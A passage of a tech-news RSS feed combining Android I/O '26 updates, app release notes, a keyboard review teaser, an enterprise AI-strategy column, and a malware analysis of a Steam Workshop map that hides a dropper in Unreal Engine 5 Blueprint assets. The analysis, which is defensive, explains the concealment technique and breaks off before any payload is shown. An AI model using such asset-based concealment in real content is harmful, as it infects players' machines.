journey is the transition of our core libraries, XR Runtime, Jetpack SceneCore, and ARCore for Jetpack XR, moving to Beta soon to provide a more stable and performant foundation. We are also accelerating hardware access through the <a href="https://goo.gle/Catalyst_IO26">Android XR Developer Catalyst Program</a>, where you can apply for XREAL’s Project Aura, audio glasses, or display glasses developer kits. Watch The latest in Android XR session or <a href="https://goo.gle/XRSDK_IO26">read our blog</a> to see how these updates help you build experiences across the ecosystem.</div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyjbgGH7RwGkOkQLoXeLd88Vo7cXRjHLBSRokBWkzvYQUrqqbfrTXukM1u_SuGq0-AoXRPoGABpCOF-HMad4-aoNvXjTVyNXgGpbffTlSQMbTaXJva1c2GiUBx1fhC4fCCd0XO9XFzKNzs6edNqo0RAx-p2ZNXy0l-StJh7AxhyphenhyphenrXi-lqe-jXL0n8oprs/w640-h360/Aura%20Geospatial%20Tour%20Demo%20-%20Draft%2001%20(1).gif"></div><i><div><i>Early preview of the Geospatial API  in ARCore for Jetpack XR, enabling high-precision anchoring of digital content to real-world locations.</i></div></i><h3><strong><span>13: Android is your new home for professional-grade media experiences</span></strong></h3>
  Android 17 streamlines the entire media lifecycle with a production-ready toolkit. High-fidelity capture is now simplified with the CameraXViewfinder Composable, which handles complex scaling and responsiveness on foldables and tablets. For post-production, the new Media3 AI Effects library provides a single interface for premium features like Magic Eraser and Studio Sound, automatically optimizing for the device's hardware. <br><br>The pipeline is completed by CodecDB, offering chipset-specific encoding recommendations to eliminate export noise, and a new Scrubbing Mode in ExoPlayer for ultra-smooth seeking. Whether you’re compositing multi-asset edits with Media3 Transformer or using the streamlined CastPlayer API, these updates ensure a professional-grade experience with significantly less development overhead.</div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXXvjrWhhRUXdYJyhuu-Vnf0UP2jKcYhAvUggZJi10kndrixZdx4cD8HEhrWVmavlxAUT5N025Fx1kgOLJP5w83LDUSR3E9YzfIJUuZ3WBedFSBtI_oLgIcxSOYg-s53obwX_8HtYqfxSaz95LVzSiMAdrrwgL4T6TVETwtxxkZV2mSkkAfvYA681zNlc/w640-h542/supercharge%20(1).gif"></div><div class="separator"><i>Low Light Boost and Magic Eraser in action</i></div><h3><strong><span>14: Increase app discovery and engagement on Google TV</span></strong></h3>
  Pointer remotes, which enable motion-controlled input, will be a future way for users to interact with Google TV as it unlocks faster user navigation. App developers can start <a href="https://developer.android.com/training/tv/get-started/hardware#no-touchscreen">declaring support for pointing input</a> to ensure their apps are discoverable on future TVs with pointer remotes. Additionally, the Engage SDK, formerly known as the Video Discovery API, optimizes Resumption, Entitlements, and Recommendations across all Google TV form factors to boost app discovery and engagement. It’s a great time to start onboarding the Engage SDK now, since the legacy Watch Next API, which has been powering your continue watching 1.0 experience, will lose support in the 2nd half of 2027. Get all the details in our <a href="http://android-developers.googleblog.com/2026/05/increase-google-tv-app-discovery.html">blog</a>.</div><div><h3><strong><span>15: Performance: the foundation of a great app experience</span></strong></h3>To help developers navigate memory limits in Android 17, we've launched a suite of optimization tools. The <a href="https://developer.android.com/r8-analyzer">R8 Configuration Analyzer</a> identifies keep rules that are bloating your binary, while <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/how-to-capture">ProfilingManager</a> and the integrated LeakCanary in Android Studio streamline memory leak detection. Furthermore, the new <a href="https://developer.android.com/android-performance-analyzer">Android Performance Analyzer</a> offers advanced AI integration for complex trace analysis and automated SQL query generation to pinpoint performance bottlenecks.     <h2><strong><span>And The Latest on Driving Business Growth </span></strong></h2>

  <h3><strong><span>16: What’s new in Google Play</span></strong></h3>Today's <a href="https://goo.gle/play-io26">updates from Google Play</a> help expand your reach and scale your business with less complexity. We’re redefining Play Store discovery with an immersive, short-form video format called Play Shorts, while expanding your audience beyond the store with app discovery in the Gemini app on Android and web. Plus, we’re introducing powerful new capabilities like agentic catalog management for seamless bulk price and SKU updates, and using Gemini models to enable Play Console  to pre-populate store listings from imported documents—making global localization effortless. </div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOB1wGZNYGPgY0ED70X7Dtl2KiFk8kRH4fv3HrXXTWX0-xKkN4Em0mi8QAB0g2w_-4SNcTR4fJazpiQ7XI6-XKeyQniFhULKWNmV8YvyWMuQ9tosvT5ixZ0FOye27DI90R5Tra1eWX3FCX7OrWkgzhvhCD6vtfD8_6-FMfMWDvXoVv3zSTauZwraDGsM4/w640-h360/IO26_BlogInLine_App-discovery-in-Gemini_1920x1080_1605.gif"></div><div><i>Gemini will provide users with app suggestions during a search</i></div>

  <h3><strong><span>17: And of course, Android 17</span></strong></h3>
  Android 17 includes new performance &amp; system architecture improvements (in addition to app memory limits) like a lock-free MessageQueue and a GC with more frequent, less intensive young-generation collections to ensure system-wide stability and smoother UIs. The new <a href="https://developer.android.com/about/versions/17/features/contact-picker">contact picker</a> and <a href="https://developer.android.com/reference/android/content/Intent#ACTION_OPEN_EYE_DROPPER">eyedropper API</a> help minimize the use of sensitive permissions and unnecessary access to user data. <br><br>Review <a href="https://developer.android.com/about/versions/17/behavior-changes-all">the behavior changes</a> to make sure your app is ready for Android 17, including <a href="https://developer.android.com/about/versions/17/behavior-changes-all#bg-audio">background audio hardening</a> and <a href="https://developer.android.com/about/versions/17/behavior-changes-all#sms-otp-all-apps">SMS OTP protection</a>. Get ready to <a href="https://developer.android.com/about/versions/17/behavior-changes-17">target Android 17</a> (API 37) with changes such as mandatory large-screen resizability, certificate transparency by default, and restricted local network access. You can start testing today by enrolling your device <a href="https://android-developers.googleblog.com/2026/04/the-fourth-beta-of-android-17.html">in the Beta</a> or using the latest 17.0 emulator images. <br><br>One more thing. the third beta of our Android 17 quarterly platform release (QPR1) just came out, and it contains a minor SDK release to support a few features that just couldn't wait for QPR2.

  <h2><strong><span>Check out all of the Android &amp; Play Content at Google I/O </span></strong></h2>
  <p><span face="sans-serif">This was just a preview of some of the updates for Android developers at Google I/O. Tune into <a href="https://io.google/2026/explore/pa-keynote-5">What’s New in Android</a> for the latest news and announcements and <a href="https://io.google/2026/">follow Google I/O</a> for much more over the following week!</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Building Premium Android Experiences at Google I/O ‘26]]></title>
<description><![CDATA[Posted by Ataul Munim, Android Developer Relations Engineer



  
    
  



  A truly differentiated Android experience is about delivering premium delight wherever your users are. At Google I/O ‘26, we showcased how the latest advancements in the Android ecosystem can help you elevate your app'...]]></description>
<link>https://tsecurity.de/de/3693509/android-tipps/building-premium-android-experiences-at-google-io-26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693509/android-tipps/building-premium-android-experiences-at-google-io-26/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:42 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKGsnLX5Gwc9xouq7Q32ltvbL7xW_d4jnCXtoEFr7emB2wzqlZEuXM8FXe22ZPSguMX-nOrxAPYja6AYBZWxF-lKJYxw09D3f2aMyjxsSi5jinnDBjJPOIFDyqVhuJC2SjOqKHLAmstGg1nhyphenhyphenJGYfp3m71TPL_i3xFAUm6PKp3uo5WVytjoRwTIoNmMVQ/s4097/MM_Differentiated%20Experiences_Meta.png">

<div>
  <div class="separator"><em>Posted by Ataul Munim, Android Developer Relations Engineer</em></div>
</div>

<div class="separator">
  <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjimB7lZHnz1Nqt-CPhoIzMWWup9qcJd2B3wzfmG2kX-4HwtnEfrSrp9J2e7aINQrh8SaPd_mP7DvY6nQiP_K2nEju5nOCwbTan-oVeZ8rmoW1R5CvErSIFXPeuIXS7LsB8TnZZee462-ygL5IbOZ2m_C3rAcXEiv08HrPjPrku0oB-T70JyXM6lmgxzmg/s4209/MM_Differentiated-Experiences_Blog%20(1).png">
    <img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjimB7lZHnz1Nqt-CPhoIzMWWup9qcJd2B3wzfmG2kX-4HwtnEfrSrp9J2e7aINQrh8SaPd_mP7DvY6nQiP_K2nEju5nOCwbTan-oVeZ8rmoW1R5CvErSIFXPeuIXS7LsB8TnZZee462-ygL5IbOZ2m_C3rAcXEiv08HrPjPrku0oB-T70JyXM6lmgxzmg/s16000/MM_Differentiated-Experiences_Blog%20(1).png">
  </a>
</div>

<div class="separator">
  A truly differentiated Android experience is about delivering premium delight wherever your users are. At Google I/O ‘26, we showcased how the latest advancements in the Android ecosystem can help you elevate your app's quality while maximizing development efficiency.
</div>

<div>
  <p>To help you build apps that stand out, we're diving into the key tools and libraries designed to optimize your core performance, extend the surfaces of your app to other devices, and streamline how your app handles high-quality media. </p>
  <p>Here is a recap of the essential updates and sessions you need to know to deliver a next-level experience across form factors!</p>
</div>

<div class="separator">
  
</div>

<h3>Maximize app performance and ROI with the R8 Configuration Analyzer</h3>
<p>A premium experience is only as good as its foundation, and a performant foundation is what allows your app to scale across the Android ecosystem. This is especially true with the release of Android 17, which introduces conservative, device RAM-based app memory limits to target extreme memory leaks and outliers before they cause system-wide instability. To stay below these new system thresholds and prevent your app from being terminated, having a lean footprint is no longer optional: it’s a critical requirement.</p>
<p>This year, we’re making it easier to build highly optimized, fast apps by introducing the <a href="https://developer.android.com/topic/performance/app-optimization/r8-configuration-analyzer" target="_blank">R8 Configuration Analyzer</a> in Android Studio. R8 is your most powerful tool for improving app performance, but its effectiveness is often limited by overly broad "keep rules" that prevent the compiler from stripping away unused code. The new Configuration Analyzer provides optimization, obfuscation, and shrinking scores, allowing you to identify specific rules that are preventing the benefits of R8 optimization.</p>
<p>By optimizing their R8 configurations, developers at Monzo achieved a 30% improvement in cold starts and a 35% reduction in ANRs. Smaller, faster code isn't just about efficiency; it's about ensuring your app has the memory headroom to deliver delight on every form factor, from the phone to the car.</p>

<div class="separator">
  
</div>

<h3>Extend your reach with a unified approach to Widgets on Phones, Watches and Cars</h3>
<p>User interaction is shifting toward quick, glanceable moments—short bursts of information that keep users connected without needing to open the full app. To help you increase the reach of your app content, we are unifying the development experience across the Android ecosystem with Jetpack Glance. By using a consistent, Compose-based model, you can elevate the content most important to your users straight to the phone’s home screen, Wear Widgets (previously Tiles!), and cars with a familiar workflow.</p>
<p>In order to help users engage with your content and features, even outside your app, we are making widgets more expressive and adaptive with RemoteCompose. On Wear OS, RemoteCompose allows you to use the Compose tools you’re already comfortable with to define UI logic that renders natively on remote surfaces, ensuring that your glanceable experiences remain highly performant and responsive even on resource-constrained hardware. On mobile and cars, RemoteCompose is used as a new framework giving Widgets new expressive capabilities.</p>
<p>You can use Jetpack Glance (together with RemoteCompose on Wear) to deliver a cohesive user journey. Whether it’s viewing flight status on the car dashboard, checking a gate change on a watch, or managing a boarding pass from a phone widget, this shared approach maximizes your app’s presence while keeping your development effort focused and efficient.</p>

<div class="separator">
  
</div>

<div>
  <h3>Supercharge your media pipeline with a complete, production-ready toolkit</h3>
  <div>Android has become a world-class home for the entire media lifecycle, and we are simplifying the journey from the first capture to the final playback. By leveraging Jetpack CameraX and Media3, you can build professional-grade experiences that feel native across the entire ecosystem. </div>
  <p>It starts with high-fidelity capture using the CameraXViewfinder Composable, which ensures your preview remains perfectly scaled and responsive on any form factor, including foldables and tablets. Use this to build adaptive capture experiences like a picture-in-picture view for multi-tasking, or that take advantage of modern features like high-frame-rate or slow-motion capture with CameraX v1.5.<br></p>
  <p>The new Media3 AI Effects library will provide a unified interface for premium features like Image &amp; Video Enhance, Magic Eraser, and Studio Sound. This allows you to focus on the creative intent while Media3 handles the heavy lifting of choosing the most efficient and reliable path for the device. Then, use the latest improvements in multi-asset editing with Media3 Transformer to composite your edited videos together!</p>
  <p>Complete the pipeline with tools designed for professional-grade export and viewing, including:</p>
  <ul>
    <li>CodecDB, which offers data-driven encoding recommendations tailored to specific chipsets, ensuring your exported videos maintain high visual quality with minimal noise or blurriness</li>
    <li>Scrubbing Mode in ExoPlayer to provide the buttery-smooth seeking experience users expect from premium media apps</li>
    <li>Enhanced Cast support with the new CastPlayer API in Media3</li>
  </ul>
  <p>By unifying these technical pillars, you can build a cohesive, high-performance media journey that delivers both delight for your users and high ROI for your development team.</p>
</div>

<div class="separator">
  
</div>

<p>For more details, check out the <i>premium</i> Android experience <a href="https://youtube.com/playlist?list=PLWz5rJ2EKKc8lSdmWQ_fSpV9yEGRvEL6S&amp;si=H6-8-AbtEyTqSxeY" target="_blank">YouTube playlist</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.18.0-beta.1]]></title>
<description><![CDATA[Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.]]></description>
<link>https://tsecurity.de/de/3693056/downloads/v8180-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693056/downloads/v8180-beta1/</guid>
<pubDate>Sat, 25 Jul 2026 05:15:17 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.18.0]]></title>
<description><![CDATA[Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.]]></description>
<link>https://tsecurity.de/de/3693053/downloads/v8180/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693053/downloads/v8180/</guid>
<pubDate>Sat, 25 Jul 2026 05:15:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Glorious GMMK 3 PRO HE Wireless Keyboard im Test: Der Ferrari unter den kabellosen Tastaturen]]></title>
<description><![CDATA[Seitdem ich mit macOS unterwegs bin und sowohl privat als auch beruflich ein MacBook verwende, setze ich beim stationären Arbeiten am Schreibtisch auf einen externen Monitor sowie kabellose Bluetooth-Mäuse und -Tastaturen für ein besonders flexibles Setup. Bei den Tastaturen war es lange Zeit das...]]></description>
<link>https://tsecurity.de/de/3691647/ios-mac-os/glorious-gmmk-3-pro-he-wireless-keyboard-im-test-der-ferrari-unter-den-kabellosen-tastaturen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691647/ios-mac-os/glorious-gmmk-3-pro-he-wireless-keyboard-im-test-der-ferrari-unter-den-kabellosen-tastaturen/</guid>
<pubDate>Fri, 24 Jul 2026 15:13:00 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Seitdem ich mit macOS unterwegs bin und sowohl privat als auch beruflich ein MacBook verwende, setze ich beim stationären Arbeiten am Schreibtisch auf einen externen Monitor sowie kabellose Bluetooth-Mäuse und -Tastaturen für ein besonders flexibles Setup. Bei den Tastaturen war es lange Zeit das Magic Keyboard von Apple, ehe ich mich auch aus ästhetischen Gründen […]</p>
<p>Der Beitrag <a href="https://www.appgefahren.de/glorious-gmmk-3-pro-he-wireless-keyboard-im-test-der-ferrari-unter-den-kabellosen-tastaturen-402830.html">Glorious GMMK 3 PRO HE Wireless Keyboard im Test: Der Ferrari unter den kabellosen Tastaturen</a> erschien zuerst auf <a href="https://www.appgefahren.de/">appgefahren.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Fri, 24 Jul 2026 13:04:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Workshop map for MECCHA CHAMELEON is a malware dropper (full breakdown)]]></title>
<description><![CDATA[Table of Contents  Intro Initial Symptom First Look at the Workshop Files Verifying the Asset Files AssetRegistry.bin Reveals the First Clue Opening the UE5 Asset Container Reverse Engineering the Blueprint Extracting the Embedded Payload Analyzing the Dropper Script Confirming Execution on an Af...]]></description>
<link>https://tsecurity.de/de/3690349/malware-trojaner-viren/workshop-map-for-meccha-chameleon-is-a-malware-dropper-full-breakdown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690349/malware-trojaner-viren/workshop-map-for-meccha-chameleon-is-a-malware-dropper-full-breakdown/</guid>
<pubDate>Fri, 24 Jul 2026 00:21:11 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><h1>Table of Contents</h1> <ul> <li>Intro</li> <li>Initial Symptom</li> <li>First Look at the Workshop Files</li> <li>Verifying the Asset Files</li> <li>AssetRegistry.bin Reveals the First Clue</li> <li>Opening the UE5 Asset Container</li> <li>Reverse Engineering the Blueprint</li> <li>Extracting the Embedded Payload</li> <li>Analyzing the Dropper Script</li> <li>Confirming Execution on an Affected PC</li> <li>Did the Second Stage Execute?</li> <li>Analysis Summary</li> <li>Limitations &amp; Unknowns</li> <li>IOCs</li> <li>Final verdict</li> </ul> <p>A couple of my friends reported seeing a command prompt window briefly appear while Steam was downloading a custom workshop map. The map was being downloaded through the game's in-game lobby and, once the download completed it immediately began loading for the match. Since the command prompt window appeared during this transition, I decided to investigate the workshop files.</p> <p>What I found was a seemingly ordinary workshop map that contained what appears to be a malware dropper, despite having passed workshop review.</p> <p>I'm writing this up because, as far as I know, the map is still available, and because the techniques it uses to hide are worth understanding if you download workshop content. While there are still a few parts of the execution chain I can't fully explain, the artifacts themselves are interesting from a reverse engineering perspective.</p> <p><a href="https://preview.redd.it/nn7j9wf4q1fh1.png?width=1265&amp;format=png&amp;auto=webp&amp;s=0276954f24bafc16cee6b2fc2569c12bedeaea51">https://preview.redd.it/nn7j9wf4q1fh1.png?width=1265&amp;format=png&amp;auto=webp&amp;s=0276954f24bafc16cee6b2fc2569c12bedeaea51</a></p> <p><strong>1): The Initial Symptom</strong></p> <p>A black command prompt window flashed on screen for about a second before disappearing. It appeared while Steam was still downloading the workshop map, just as the game was transitioning into loading it for the match. There were no crashes, error messages, or any other unusual behavior. On its own, it would have been easy to dismiss as Steam running a background process, but seeing a console window appear during a workshop download / match launch was unusual enough that I decided to investigate.</p> <p><strong>2): First Look at the Workshop Files</strong></p> <p>The workshop content is located here:</p> <pre><code>Steam\steamapps\workshop\content\4704690\3765145606\ </code></pre> <p>At first glance, there’s nothing suspicious in the folder. The contents are:</p> <pre><code>AssetRegistry.bin Preview.png Sample.vdf SampleMyUGCMecchaCModKit_Load-Windows.pak SampleMyUGCMecchaCModKit_Load-Windows.ucas SampleMyUGCMecchaCModKit_Load-Windows.utoc </code></pre> <p>There are no executables, DLLs, batch files, or scripts. The <code>.pak</code>, <code>.ucas</code>, and <code>.utoc</code> files are simply the standard Unreal Engine 5 asset container format used for packaging game content exactly what you would expect to see from a UE5 map or mod.</p> <p>This is worth emphasizing: if you were manually checking this folder for malware, there would be no obvious red flags here. Nothing in this directory suggests anything malicious. That is likely why it passed review in the first place.</p> <p><strong>3): Verifying the Asset Files</strong></p> <p>File extensions are easy to spoof, so I checked the actual file headers and scanned the contents for embedded executable data.</p> <p>The results:</p> <ul> <li>utoc starts with <code>-==--==--==--==-</code>, which is the real IoStore magic</li> <li>pak has the correct <code>0x5A6F12E1</code> footer magic</li> <li>no MZ/PE, ELF or ZIP headers anywhere in any file</li> </ul> <p>The files appear to be valid Unreal Engine asset containers, not disguised executables. There is no standalone executable payload present in this mod. If there is unexpected behavior, it would have to be occurring through the game’s normal asset-loading pipeline rather than from an included executable file.</p> <p><strong>4): AssetRegistry.bin Reveals the First Clue</strong></p> <p>This is the detail that stands out most from the entire investigation.</p> <p>AssetRegistry.bin is largely readable metadata. You can open it in a text editor and see references to the actors placed throughout the maps. Normally, it contains exactly the kind of information you would expect: StaticMeshActor, PointLight, PlayerStart, and other standard Unreal Engine objects.</p> <p>However, one Blueprint actor immediately stands out:</p> <pre><code>/Game/Mods/NewMap.NewMap:PersistentLevel.BP_RCE_Test_C_0 </code></pre> <p>Its class resolves as:</p> <pre><code>BP_AmbientController_C </code></pre> <p>Those two names together are unusual. The class name suggests a harmless environmental or lighting-related system especially since it appears under folders such as Environment and Lighting. However, the placed actor still retains the older name BP_RCE_Test_C_0.</p> <p>In Unreal Engine, this can happen because placed actors keep the name they were created with even if the Blueprint class is later renamed. Renaming the class does not automatically rename every existing instance placed in maps.</p> <p>That means the BP_RCE_Test name likely existed at an earlier point in the asset’s history. Whether intentional or not, the old identifier remains embedded in the map metadata.</p> <p>The same reference appears across three separate maps included in the workshop item, including a NewMap_Backup file that appears to have been left in the upload.</p> <p><strong>5): Opening the UE5 Asset Container</strong></p> <p>The Blueprint data is stored inside the Oodle-compressed .ucas container. Reading the accompanying .utoc metadata reveals:</p> <pre><code>chunks ............ 57 blocks ............ 131 (130 Oodle-compressed) flags ............. Compressed | Indexed </code></pre> <p>No encryption flag is present, meaning the container can be inspected using available Unreal Engine asset tooling and compatible Oodle/Kraken decompression support. All 131 blocks decompress successfully, producing roughly 5.3 MB of extracted data.</p> <p>The container contains 55 assets in total: materials, meshes, textures, four maps, and three Blueprints. Two of those Blueprints appear to be untouched sample assets from the official ModKit, containing no custom logic.</p> <p>Searching across the extracted asset data revealed only a small number of notable references:</p> <pre><code>ReceiveBeginPlay ....... 1 ToFile ................. 1 GetPlatformUserDir 